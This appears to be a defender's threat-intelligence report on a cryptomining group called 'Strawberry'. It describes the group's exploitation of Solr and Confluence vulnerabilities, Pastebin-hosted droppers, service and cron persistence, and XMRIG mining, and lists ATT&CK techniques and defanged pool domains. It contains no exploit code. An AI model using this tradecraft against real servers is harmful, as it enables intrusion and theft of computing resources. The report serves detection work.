The next flavor from the Alert Logic data set in the activity clustering series is Strawberry.
Before diving into this activity cluster, be sure to read the series introduction here.
And continue with the rest of the series by clicking the links below:
Tactics, Techniques and Procedures
Strawberry has been seen to favor two primary exploits for gaining entry onto a vulnerable machine. We have observed the flavor exploiting the Apache Solr remote code execution (RCE) vulnerability (CVE-2019-17558) and a Confluence OGNL exploit (CVE-2021-26084).
Strawberry was late to the game, or did not initially target Alert Logic customers, with the 2019 Apache Solr RCE, as we did not observe the flavor during our initial threat hunts as part of our emerging threat process. They still saw some success with the vulnerability, maybe because Apache themselves were slow to release a fix, or more likely, a product of the sad truth that many organizations are not able to patch their vulnerable systems quickly or frequently enough.
In 2021, it is a different story – the flavor was on our radar from the start, as they mounted a campaign targeting vulnerable confluence servers as the vulnerability was emerging, and subsequently, the group had more success in exploiting machines before mitigations could be put in place. Fortunately, Alert Logic’s threat intelligence team had earmarked java OGNL as an inherently vulnerable language, where we anticipated future zero-day vulnerabilities or derivatives to be discovered. This foresight meant we already had forward-thinking wideband telemetry signatures in place that our threat hunters reviewed periodically, which in turn meant we had early warning of this new exploit and could detect and facilitate earlier responses for affected customers.
Both RCE exploits enabled Strawberry to instruct the victim machine to reach out and download malicious files and scripts to begin the installation phase. The malicious files that were pulled to infected hosts during installation were hosted on pastebin[.]com, which is a website that allows users to share plain text files through public posts called ‘pastes.’ The site is very popular, with 17 million monthly users, commonly looking to share legitimate code. Pastebin is often abused by threat actors as it is a free resource where you can easily and anonymously host code, making it a simple location to house malicious code.
Of course, as a legitimate website, Pastebin is frequently taking down pastes that do not adhere to its code of conduct. Therefore, the Strawberry group was forced to use a variety of files as the Pastebin admins work to identify and remove the malicious content.
Once the dropper is pulled from Pastebin, double persistence is established by creating a new service (typically named javae[.]service) and setting up a new cron job (Linux equivalent of scheduled task).
Strawberry proceeds to pull down crypto-miner related files, hijacking the victim’s resources to create a steady monetary output for the flavor… if undetected.
Interestingly, the mining configurations differ between each victim, although the method of setup remains consistent. The working hypothesis here is that Strawberry is more concerned with their financial outcomes being attributed to malicious activity than they are with their malicious activities being identified.
They have demonstrated the ability to change the superficial, simpler indicators of campaigns, such as attacker infrastructure, but not the areas that are more sophisticated, like the tactics, techniques and procedures (TTPs) used once they gain initial access.
Generally, Strawberry makes use of public cloud infrastructure, namely AWS and the South Korean AWS region, during the recon to exploit phases. By using public cloud infrastructure, Strawberry can quickly generate and burn machines and IP addresses to circumvent any blocklists they may have added to during active reconnaissance. In the latter stages, they move away from AWS but still use IPs consistent with South Korea, with a rouge Google address being the exception.
It is important to emphasize that the geographical location of the infrastructure used by the attacker does not amount to attribution. While this information is helpful in identifying the flavor’s actions, the Korean infrastructure preference does not equate to Korean actors.
The Pastebin file and the crypto-miner configuration variations observed present the greatest variations seen in Strawberry’s actions. Otherwise, Strawberry’s modus operandi has limited variations when compared to other documented flavors.
A good comparison can be made with Mint, who also seek vulnerable Linux servers, indiscriminate of sector or organization. However, Mint regularly revisits their tactics, making changes to naming conventions and subtle, superficial changes to code in an attempt to evade detection and prevention controls. In contrast, our threat hunters view Strawberry as a fairly basic flavor with more static indicators.
Our readers may have noticed other similarities between Mint and Strawberry, including similarities in the kill chain sequence leading to the same outcome, crypto mining. At a glance, it’s fair to believe that these flavors could be combined and classified together; however, the subtleties in how we detect a Mint vs. Strawberry are significant, such as the combinations of differences found in both infrastructure and capabilities. Ultimately, the activity clusters are distinct making it very likely they are not the same actor/group.
By separating out the two flavors, we are better equipped to identify compromise earlier, know exactly what/where to look next, and ultimately provide a comprehensive and thorough remediation plan for our customers. The documented intelligence of the Strawberry activity cluster allows us to holistically respond to a compromise, by extrapolating likely next steps from our established understanding.
Known Exploits Used
- CVE-2021-26084 [exp]
- CVE-2019-17558 [exp]
- Active Scanning – T1595 [recon]
- Exploit Public-Facing Application – T1190 [recon/delivery/exploit]
- Scheduled Task/Job: Cron – T1053.003 [inst persistence]
- Service creation [inst persistence] – Create or Modify System Process – T1543
- Ingress Tool Transfer – T1105 [inst / C2]
- Application Layer Protocol – T1071 [C2]
- XMRIG Crypto mining [AoO]
- Resource hijacking – T1496 [AoO]
- Vulnerable Linux Servers
- AWS – South Korean region [recon, deliv, exp]
- pastebin[.]com [inst]
- South Korean IPs (not attribution)
- Google LLC [inst]
- geo[.]c3pool[.]com [AoO]
- mine[.]c3pool[.]com [AoO]
- Ioflood [AoO]
- Hetzner Online GmbH [AoO]
- OVH SAS [AoO]
- EONIX-COMMUNICATIONS-ASBLOCK-62904 [AoO]
- pool[.]supportxmr[.]com [AoO]
Actions on Objectives
- Crypto mining (XMRIG)
Next in the series: